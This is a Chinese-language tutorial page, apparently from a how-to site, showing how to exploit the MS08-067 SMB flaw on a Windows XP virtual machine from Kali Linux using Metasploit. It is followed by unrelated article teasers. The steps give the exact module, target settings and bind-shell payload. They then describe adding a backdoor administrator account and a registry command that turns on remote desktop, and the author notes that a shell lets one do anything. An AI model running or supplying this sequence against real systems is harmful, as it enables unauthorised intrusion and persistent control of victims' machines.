kalilinux攻击漏洞MS08_067

在这里小编为大家介绍一下基于linux平台的ms08_067漏洞的利用。我用VMware搭建了一个实验环境,   kalilinux:192.168.116.3   winxp 192.168.116.116  要做的就是用Kali Linux里的Metasploit入侵WinXP

操作方法

  • 01

    在Kali用命令  msfconsole 开启Metasploit  (在终端里输入msfconsole)

  • 02

    然后运行命令: use exploit/windows/smb/ms08_067_netapi                #使用MS08067漏洞攻击程序

  • 03

    set LHOST 192.168.116.3                                                        #设置本地主机IP

  • 04

    set RHOST 192.168.116.116                                                     #设置目标主机IP

  • 05

    set payload windows/shell_bind_tcp                                   #设置payload

  • 06

    show options    #查看设置信息

  • 07

    exploit         #实施攻击

  • 08

    攻击成功,我们得到了一个cmdshell,接下来就是新建账户了。

  • 09

    添加用户名为zeal,密码为zeal的用户,并把zeal用户添加到管理组。接下来执行命令 netstat -an 看一下目标主机开放端口的情况

  • 10

    发现并没有开启3389(远程桌面连接端口),我们需要手动开启。需要执行命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

  • 11

    有了目标主机的cmdshell你想做什么不行吧?

  • 12

    好了演示到此完毕!

(0)

相关推荐

  • 如何检测SQL注入技术以及跨站脚本攻击

    在最近两年中,安全专家应该对网络应用层的攻击更加重视.因为无论你有多强壮的防火墙规则设置或者非常勤于补漏的修补机制,如果你的网络应用程序开发者没有遵循安全代码进行开发,攻击者将通过80端口进入你的系统 ...

  • 黑客攻击步骤

    黑客入侵常用的攻击手法 操作方法 01 1. 利用系统漏洞进行攻击这是一种最普通的攻击手法,任何一种软件.一种操作系统都有它的漏洞,因而利用操作系统本身的漏洞来入侵.攻击网站也成为了一种最普遍的攻击手 ...

  • Win8电脑安全软件兼容性测试

    电脑中的安全软件对系统本身的使用权限要求较高,在与操作系统紧密结合的过程中,就存在了与系统兼容性的问题。在这个问题上,兼容性越好的话,安全软件本身功能的发挥更为全面,更能准确地保护电脑系统的安全。 待 ...

  • server服务自动停止关闭如何解决?

    一些朋友在使用windows vps的时候,常会遇到系统默认随系统自动启动的ComputerBrowser.Server.Workstation三个服务,总是在运行一段时间后自动停止关闭,导致vps不 ...

  • 《鬼泣3》完整图文攻略

    <鬼泣3>图文攻略.有难点的地方都用图片 操作方法 01 misson 1: 游戏开始第一关,但丁刚刚洗完头出来准备吃比萨,突然有个光头佬到访.那个光头佬竟然向但丁发起了挑战. 然后一大堆 ...

  • 预防查询语句数据库注入漏洞攻击

    简单地说,Sql注入就是将Sql代码传递到应用程序的过程,但不是按照应用程序开发人员预定或期望的方式插入,相当大一部分程序员在编写代码的时候,并没有对用户输入数据的合法性进行判断,使应用程序存在安全隐 ...

  • ssl最新漏洞曝光 可通过wifi可攻击ios设备

    ssl最新漏洞曝光咯,可通过WiFi可攻击ios设备。近来,苹果设备已经证实可以通过无线网络进行攻击,究竟是怎么回事呢?大家都很想知道原因吧,接着看下文吧。 来自Skycure的研究人员称,他们发现专 ...

  • 160wifi可避免wifi漏洞被黑客利用攻击

    操作方法 01 你知道吗?我们最常使用的家用无线路由器有可能会存在"弱密码"漏洞,可能会遭到黑客攻击,好在160wifi可避免wifi漏洞被黑客利用攻击,下面就让我们了解一下详细内 ...

  • DNS漏洞不容小觑 谨防DDoS攻击乘虚而入

    时间短的安静之后,黑客们又开端跃跃欲试.不久前,全球闻名黑客安排 Anonymous(匿名者)揭露表明会在在3月31日对准DNS域名根服务器建议大规模DDoS进犯举动,让全球的互联网堕入瘫痪;Lulz ...